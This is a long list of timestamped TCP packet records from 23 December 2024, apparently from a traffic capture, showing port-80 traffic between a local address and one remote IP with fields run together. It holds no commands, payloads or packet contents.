                                                                                                        Dec 23, 2024 08:39:46.248172045 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.248229027 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.249185085 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.249236107 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.249300957 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.250271082 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.250345945 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.250355959 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.251348019 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.251418114 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.251450062 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.252371073 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.252439976 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.252473116 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.253407955 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.253499985 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.253528118 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.254506111 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.254551888 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.254621983 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.255583048 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.255640984 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.255681038 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.256632090 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.256664991 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.256710052 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.257673979 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.257741928 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.257780075 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.258739948 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.258867025 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.258869886 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.259831905 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.259936094 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.260004997 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.260873079 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.260961056 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.260987043 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.261934042 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.261982918 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.262043953 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.263041019 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.263093948 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.263144970 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.264097929 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.264178991 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.264247894 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.265177011 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.265245914 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.265271902 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.266226053 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.266283989 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.266294956 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.267285109 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.267342091 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.267374992 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.268399954 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.268479109 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.268523932 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.269403934 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.269469023 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.269505978 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.270477057 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.270493984 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.270543098 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.271538019 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.271591902 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.271630049 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.272597075 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.272650003 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.272768974 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.273652077 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.273720026 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.273746014 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.274725914 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.274765968 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.274817944 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.275799036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.275850058 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.275908947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.276837111 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.276932001 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.276962042 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.277940989 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.278054953 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.278057098 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.279005051 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.279088020 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.279120922 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.280086994 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.280143023 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.280163050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.397262096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.397311926 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.397342920 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.397742987 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.397799015 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.397939920 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.398133039 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.398175001 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.399343967 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.399430990 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.400073051 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.400130033 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.400166988 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.400208950 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.401119947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.401217937 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.401961088 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.402180910 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.402307987 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.402410984 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.403224945 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.403345108 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.403390884 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.404310942 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.404449940 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.404501915 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.405275106 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.405374050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.405437946 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.406342983 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.406445026 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.406517982 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.407351971 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.407476902 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.407804012 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.408406973 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.408525944 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.408567905 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.409430981 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.409446955 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.409576893 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.413188934 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.413254976 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.413495064 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.413552999 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.413568020 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.413594961 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.414536953 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.414607048 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.414648056 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.415560007 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.415951967 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.416062117 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.416177988 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.417053938 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.417115927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.417119026 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.418051958 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.418175936 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.418185949 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.419081926 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.419198990 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.419244051 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.420125961 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.420181036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.420181990 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.421211958 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.421324015 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.421371937 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.422216892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.422267914 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.422302008 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.423257113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.423362017 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.423420906 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.424273968 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.424487114 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.424572945 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.425263882 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.425331116 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.425389051 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.426336050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.426436901 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.426446915 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.427376032 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.427403927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.427450895 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.428402901 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.428487062 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.428512096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.429428101 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.429471970 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.429516077 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.430474043 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.430532932 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.430572033 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.431503057 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.431602955 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.431641102 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.432533026 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.432574034 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.432620049 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.433576107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.433669090 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.433717012 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.434604883 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.434657097 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.434720039 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.435655117 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.435748100 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.435794115 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.436674118 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.436717033 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.436777115 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.437756062 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.437879086 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.437968969 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.438772917 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.438817978 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.438885927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.439812899 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.439933062 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.440022945 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.440885067 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.440928936 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.441008091 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.442058086 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.442141056 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.442182064 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.443140030 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.443191051 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.443217039 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.444228888 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.444292068 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.444298983 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.445014000 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.445080042 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.445111036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.446008921 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.446144104 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.446183920 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.447052002 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.447149038 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.447158098 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.448106050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.448235035 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.448288918 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.449122906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.449230909 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.449285984 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.450154066 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.450237989 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.450278044 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.451206923 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.451258898 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.451308012 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.452241898 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.452327013 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.452342033 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.453257084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.453378916 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.453453064 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.454324007 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.454422951 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.454478979 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.455456972 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.455548048 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.455583096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.456383944 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.456504107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.456553936 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.457380056 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.461110115 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.589852095 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.589945078 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.590009928 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.590217113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.590322971 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.590399027 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.591254950 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.591360092 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.591411114 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.592386961 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.592475891 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.593373060 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.593441010 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.593494892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.593538046 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.594384909 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.594481945 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.594681025 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.595452070 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.595508099 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.595861912 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.596437931 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.596551895 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.596641064 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.597497940 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.597683907 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.597739935 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.598577976 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.598712921 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.598769903 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.605663061 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.605761051 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.605823040 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.606136084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.606261969 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.606311083 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.607211113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.607361078 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.607414961 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.608268976 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.608359098 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.608428955 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.609235048 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.609369993 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.609435081 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.610302925 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.610549927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.610603094 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.611325979 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.611363888 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.611407995 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.612354994 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.612430096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.612481117 CET4980080192.168.2.6139.99.188.124
